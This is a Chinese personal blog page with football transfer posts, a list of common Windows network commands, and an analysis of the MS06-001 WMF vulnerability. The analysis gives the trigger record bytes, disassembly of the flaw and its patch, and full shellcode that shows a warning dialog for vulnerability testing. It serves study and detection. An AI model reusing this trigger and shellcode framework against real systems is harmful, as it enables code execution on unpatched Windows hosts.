Profil de 莫名其妙就是我莫名其妙PhotosBlogListes Outils Aide

莫名其妙就是我

Occupation
Lieu
Centres d'intérêt 
神经质,抑郁症,强迫症,不过基本上是个好人。
Listes

莫名其妙

车路士fans
9 avril

车路士今夏转会动作预测

转会进来:
Ballack,可靠性90%
据说Ballack和chelsea的合同基本谈妥,就差签字了。对于chelsea来说,免费得到一个可以改变比赛结果的中场悍将是个相当划算的交易,即使他的工资很高很高很高,年纪也比较老了。。。魔连奴也会很高兴,ballack的到来将会丰富他的战术,爱用中场进球的chelsea下一季的进球可能会多更多。不过我个人还是喜欢Steven Gerrard.
 
转会出去:
Maniche,可靠性80%
中场来了Ballack,必然要走一个,考虑种种因素,Maniche是最可能走的。冬季才转会过来的葡萄牙人,一直未能有所表现,只能在垃圾时间上上场,魔连奴对他的耐性用完了。
 
想到再写,待续。

Raul离开马德里?!

     今日循例上sina体育看八卦新闻,惊闻Ronaldo和Raul不和,Ronaldo还声称伯纳乌有Raul就没有他.看到这里,不禁感叹,为什么球员就不能好好踢球呢?每个球队总会出现点更衣室问题,拉帮结派不在话下,在i球场上还不卖力,那些球星能对得起自己的周薪吗?
     Raul一直是我欣赏的球员,他可谓职业球员的典范。虽然他一直很努力,但是有些事情并非如人所愿,最近伤愈复出又陷入了进球荒使他的前景很不妙。However,毕竟Raul是黄麻的旗帜,就如Totti之于Roma,Del Pierro之于Juventus,衷心祝愿他能渡过难关。
31 janvier

MS06001 图形呈现引擎(WMF)漏洞分析

图形呈现引擎中由于其处理 Windows 图元文件 (WMF) 图像的方式而存在一个远程执行代码漏洞。据FlashSky所言是MS早期在处理OLE而在WMF(没有考虑安全)中定义的功能。漏洞因0day方式传播而导致漏洞被曝光。Win2000、XPsp1、XPsp2代码略有不同,如下代码是XPsp1的。

一、漏洞分析:
    漏洞出现的问题是在PlayMetaFile函数中,函数调用关系如下:
   
    Gdi32.dll!PlayMetaFile
                PlayMetaFileRecord
                   Escape
                     SetAbortProc
    在PlayMetaFileRecord函数中将比较wmf格式中的相关Record结构,如果该标记不为0X49和后续的标记不为0X0f则转向跳到ESCAPE函数上,ESCAPE会允许设置为wmf一个段当作代码,并将这个地址传送给sETaBORTpROC,在sETaBORTpROC函数返回的时候,WMF文件中的代码将会被执行。
    在WMF文件头中增加如下Record可以激活漏洞:11 00 00 00 26 06 09 00 16 00

.TEXT:77c4b65c           PUSH  [EBP+UfLAGS]            ; CASE 0X26
.TEXT:77c4b65f           PUSH  EBX
.TEXT:77c4b660           CALL  _pLAYiNTOamETAFILE@8    ; pLAYiNTOamETAFILE(X,X)
.TEXT:77c4b665           CMP   EAX, EDI
.TEXT:77c4b667           MOV   [EBP+VAR_4], EAX
.TEXT:77c4b66a           JNZ   LOC_77c4b424
.TEXT:77c4b670           MOV   AX, [EBX+6]        ;AX=09=sETaBORTpROC
.TEXT:77c4b674           CMP   AX, 0fH
.TEXT:77c4b678           JNZ   LOC_77c5fc0a
...
.TEXT:77c61062           SUB   EDI, 6            ;将9进行减去三次,如果在减6为0
.TEXT:77c61065           JZ    SHORT LOC_77c61090    ;则跳到sETaBORTpROC函数
...
.TEXT:77c61090           PUSH  [EBP+ARG_c]             ; abortproc
.TEXT:77c61093           PUSH  [EBP+ARG_0]             ; hdc
.TEXT:77c61096           CALL  _sETaBORTpROC@8         ; sETaBORTpROC函数将返回1
...
.TEXT:77c604c8           MOV   EAX, [EAX+14H]        ;代码地址传入eax
.TEXT:77c604cb           CMP   EAX, ECX            ;如果该地址为空跳走
.TEXT:77c604cd           JZ    LOC_77c4b286
.TEXT:77c604d3           PUSH  ECX
.TEXT:77c604d4           PUSH  EDI
.TEXT:77c604d5           CALL  EAX            ;执行wmf文件中的代码!
.TEXT:77c604d7           TEST  EAX, EAX
.TEXT:77c604d9           JZ    LOC_77c5c87b
.TEXT:77c604df           JMP   LOC_77c4b286
 
补丁改动:
    MS修补这个漏洞采用直接比较是否为0x09,如果是则不走入Escape函数,直接返回。
7F032200    837C24 04 09          CMP DWORD PTR SS:[ESP+4],9   ;直接比较标记是否为09
7F032205    74 08                 JE SHORT GDI32.7F03220F
7F032207    837C24 04 0F          CMP DWORD PTR SS:[ESP+4],0F
7F03220C    74 01                 JE SHORT GDI32.7F03220F
7F03220E    40                    INC EAX
7F03220F    C2 0400               RETN 4
 
二、检测Shellcode:
    为检测主机是否存在漏洞,构造了一个WMF文件,发现现有的ShellCode无不是为了入侵(add user&downexec),流传的那个0day会崩掉Explorer.exe,于是自己写了一个简易弹出提醒对话框的Shellcode,代码如下:
    __asm
    {
        pushad
        sub esp, 100;
        mov ebp,esp;
        mov eax,fs:0x30   
        mov eax,[eax+0x0c]
        mov esi,[eax+0x1c]
        lodsd               
        mov edi,[eax+0x08]
        mov eax, [edi+3Ch]
        mov edx,[edi+eax+78h]
        add edx,edi               
        mov ecx,[edx+18h]
            mov ebx,[edx+20h]                
        add ebx,edi                               
sa:
        dec ecx
        mov esi,[ebx+ecx*4]               
        add esi,edi   
        mov eax,0x50746547
        cmp [esi],    eax
        jne sa
        mov eax,0x41636f72
        cmp [esi+4],eax
        jne sa               
            mov ebx,[edx+24h]
        add ebx,edi
        mov cx,[ebx+ecx*2]
            mov ebx,[edx+1Ch]
        add ebx,edi
        mov eax,[ebx+ecx*4]           
        add eax,edi           
        mov [ebp+76], eax           
        push 0x0
        push dword ptr 0x41797261
        push dword ptr 0x7262694c
        push dword ptr 0x64616f4c
        push esp
        push edi                   
        call [ebp+76]
        mov [ebp+80],  eax
        push dword ptr 0x00003233
        push dword ptr 0x72657375
        push esp
        call [ebp+80]    ;LoadLibraryA
        mov edi,eax
        push dword ptr 0x0041786F
        push dword ptr 0x42656761
        push dword ptr 0x7373654D
        push esp
        push edi                   
        call [ebp+76]
        mov [ebp+84],  eax
        mov byte PTR [ebp-41h],00h
        mov byte PTR [ebp-40h],00h
        lea esi,[ebp-41h]
        mov byte PTR [ebp-19h],46h
        mov byte PTR [ebp-18h],6fh
        mov byte PTR [ebp-17h],75h
        mov byte PTR [ebp-16h],6eh
        mov byte PTR [ebp-15h],64h
        mov byte PTR [ebp-14h],20h
        mov byte PTR [ebp-13h],57h
        mov byte PTR [ebp-12h],4dh
        mov byte PTR [ebp-11h],46h
        mov byte PTR [ebp-10h],20h
        mov byte PTR [ebp-0fh],76h
        mov byte PTR [ebp-0eh],75h
        mov byte PTR [ebp-0dh],6ch
        mov byte PTR [ebp-0ch],6eh
        mov byte PTR [ebp-0bh],75h
        mov byte PTR [ebp-0ah],72h
        mov byte PTR [ebp-09h],61h
        mov byte PTR [ebp-08h],62h
        mov byte PTR [ebp-07h],69h
        mov byte PTR [ebp-06h],6ch
        mov byte PTR [ebp-05h],69h
        mov byte PTR [ebp-04h],74h
        mov byte PTR [ebp-03h],79h
        mov byte PTR [ebp-02h],21h
        mov byte PTR [ebp-01h],00h
        lea edi,[ebp-19h]
        push 0x30
        push esi
        push edi
        push 0
        call [ebp+84]
        add esp,136
        popad
        retn
    }
    利用这个Shellcode构造了一个测试的wmf文件(320字节),有漏洞主机预览此附件会弹出发现风险的提示窗口。
30 janvier

[网络基础版]各种命令行集锦 (常用CMD命令)


 1.
最基本,最常用的,测试物理网络的  

  ping 192.168.10.88 t ,参数-t是等待用户去中断测试

 2.
查看DNSIPMac  

  A.Win98winipcfg

  B.Win2000以上:Ipconfig/all

  C.NSLOOKUP:如查看河北的DNS

    C:\>nslookup
   Default Server: ns.hesjptt.net.cn
   Address: 202.99.160.68
   >server 202.99.41.2 则将DNS改为了41.2
   > pop.pcpop.com
   Server: ns.hesjptt.net.cn
   Address: 202.99.160.68
   Non-authoritative answer:
   Name: pop.pcpop.com
   Address: 202.99.160.212

 3.
网络信使  

  Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段

  net stop messenger 停止信使服务,也可以在面板-服务修改

  net start messenger 开始信使服务

 4.
探测对方对方计算机名,所在的组、域及当前用户名  

  ping a IP t ,只显示NetBios

  nbtstat -a 192.168.10.146 比较全的

 5.netstat -a
显示出你的计算机当前所开放的所有端口  

  netstat -s -e 比较详细的显示你的网络资料,包括TCPUDPICMP IP的统计等

 6.
探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IPMAC地址  

  arp -a

 7.
在代理服务器端  

  捆绑IPMAC地址,解决局域网内盗用IP

  ARP s 192.168.10.59 0050ff6c0875

  解除网卡的IPMAC地址的绑定:

  arp -d 网卡IP

 8.
在网络邻居上隐藏你的计算机  

  net config server /hidden:yes

  net config server /hidden:no 则为开启

 9.
几个net命令  

  A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
   比如:查看这个IP上的共享资源,就可以
  C:\>net view 192.168.10.8
  在 192.168.10.8 的共享资源
  资源共享名 类型 用途 注释
  --------------------------------------
  网站服务 Disk
  命令成功完成。

  B.查看计算机上的用户帐号列表 net user

  C.查看网络链接 net use
   例如:net use z: \\192.168.10.8\movie 将这个IPmovie共享目录映射为本地的Z

  D.记录链接 net session
   例如:
  C:\>net session
  计算机 用户名 客户类型 打开空闲时间
  -------------------------------------------------------------------------------
  \\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
  \\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
  命令成功完成。

 10.
路由跟踪命令  

  A.tracert pop.pcpop.com

  B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

 11.
关于共享安全的几个命令  

  A.查看你机器的共享资源 net share

  B.手工删除共享
   net share c$ /d
  net share d$ /d
  net share ipc$ /d
  net share admin$ /d
  注意$后有空格。

  C.增加一个共享:
   c:\net share mymovie=e:\downloads\movie /users:1
  mymovie 共享成功。
  同时限制链接用户数为1人。

 12.
DOS行下设置静态IP  

  A.设置静态IP
   CMD
  netsh
  netsh>int
  interface>ip
  interface ip>set add "本地链接" static IP地址 mask gateway
  
  B.查看IP设置
   interface ip>show address
  测试mtu
  ping -f -l size 服务器ip

 
Photo 1 sur 4
Autres albums (1)